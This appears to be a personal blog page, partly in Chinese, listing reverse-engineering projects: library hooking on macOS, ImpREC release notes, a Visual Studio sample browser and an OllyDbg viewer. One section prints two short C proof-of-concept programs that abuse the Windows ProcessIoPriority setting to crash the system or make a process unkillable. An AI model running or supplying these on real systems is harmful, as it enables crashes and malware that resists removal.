Open Sources


至于开源的东西,其实自己也蛮想做的。但是苦于技术水平不够,所以一直也没什么东西公布。刚开始的时候代码都是托管在Googlecode, 后来迁移到了github,但是苦于github不能创建私有项目,于是最后选择了bitbucket上,另外一个好处是可以绑定域名。于是以后有代码公布的话,可以访问这个网址访问

Hooking library calls on Mac using DYLD_INSERT_LIBRARIES

Mac offers a way to override functions in a shared library with DYLD_INSERT_LIBRARIES environment variable (which is similar to LD_PRELOAD on Linux). When you make a twin brother of a function that is defined in an existing shared library, put it in you a shared library, and you register your shared library name in DYLD_INSERT_LIBRARIES, your function is used instead of the original one. This is my simple test. Here I’ve replaced f() in mysharedlib.dylib with f() in openhook.dylib.

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ProcessIoPriority Bug (BSOD/Non-Killable Process)


#define ProcessIoPriority               0x21
int main()
    unsigned long val=0xFFFFFFFF;
    int ret=ZwSetInformationProcess(GetCurrentProcess(),ProcessIoPriority,&val,0x4);
    if(ret<0) printf("Error %x\r\n",ret);
    return 0;

Non-Killable Process:

#define ProcessIoPriority               0x21
int main()
    unsigned long val=0x8000F129;
    int ret=ZwSetInformationProcess(GetCurrentProcess(),ProcessIoPriority,&val,0x4);
    if(ret<0) printf("Error %x\r\n",ret);
    return 0;

With the “ProcessInformationClass” parameter set to ProcessIoPriority 0x21, passing certain signed values e.g. 0xFFFFFFFF or 0x8000F129 in the variable pointed to by the “ProcessInformation” parameter to the ntdll “ZwSetInformationProcess” function can be abused to arbitrarily set certain bit flags of the corresponding “_EPROCESS” structure e.g. DefaultIoPriority: Pos 27, ProcessSelfDelete : Pos 30, or SetTimerResolutionLink: Pos 31.


ImpREC lite v11 Source Code(Share)

ImpREC is back to public. This version can now support Windows 95 (Thanks to EliCZ,
Unknown One and ZigD for testing).
It has also been redesigned to support more import rebuilding schemes (relative calls for
example). The plugin interface has changed completely (using filemapping) and now supports
the ‘Exact Call’ feature. This last one has been linked with the ‘Create New IAT’. It will
be useful for all mangled schemes which annihilate completely or partially the IAT. The
‘AutoTrace’ is more stable because it will not use the Tracer Level2 anymore. A built-in
coloured disassembler/hew-viewer will help you to watch the redirected code. Then you
should not need the ASProtect plugin because of no more updates but it still is there as
example. Please take a look at <History.txt> for all details.

I hope you will enjoy this version like i did to make it,



– Misc

– Finally fixed the bug in the check for adding section (Thanks to Christoph)

v1.6 beta *PRIVATE*
– Tracers
– Tracer Level3
– Added EIP Log
– Misc
– Finally, support relative calls rebuild (not with the loader yet)
– Added a disassembler window for redirected code
– Added colour to all known imports (Thanks to Jeff Schering)
– Added a hex viewer (built with the disassembler)
– Fixed blink in RichEdit control
– Checkbox “OpCodes” is enable/disable depending on “Hex View”
(Thanks to Muffin)

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VS 2012示例代码浏览器




Visual Studio 示例代码浏览器和Visual Studio无缝集成。充分利用Visual Studio界面让你在开发过程中轻松搜索示例代码。譬如,当你在Visual Studio中编辑代码时,你可以选中一段API或代码段,敲击Alt+F1快捷键或右键选择Search Code Samples,便可针对所选择API搜索相关示例代码。

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Ollydbg/Immdbg Mem Viewer Source Code





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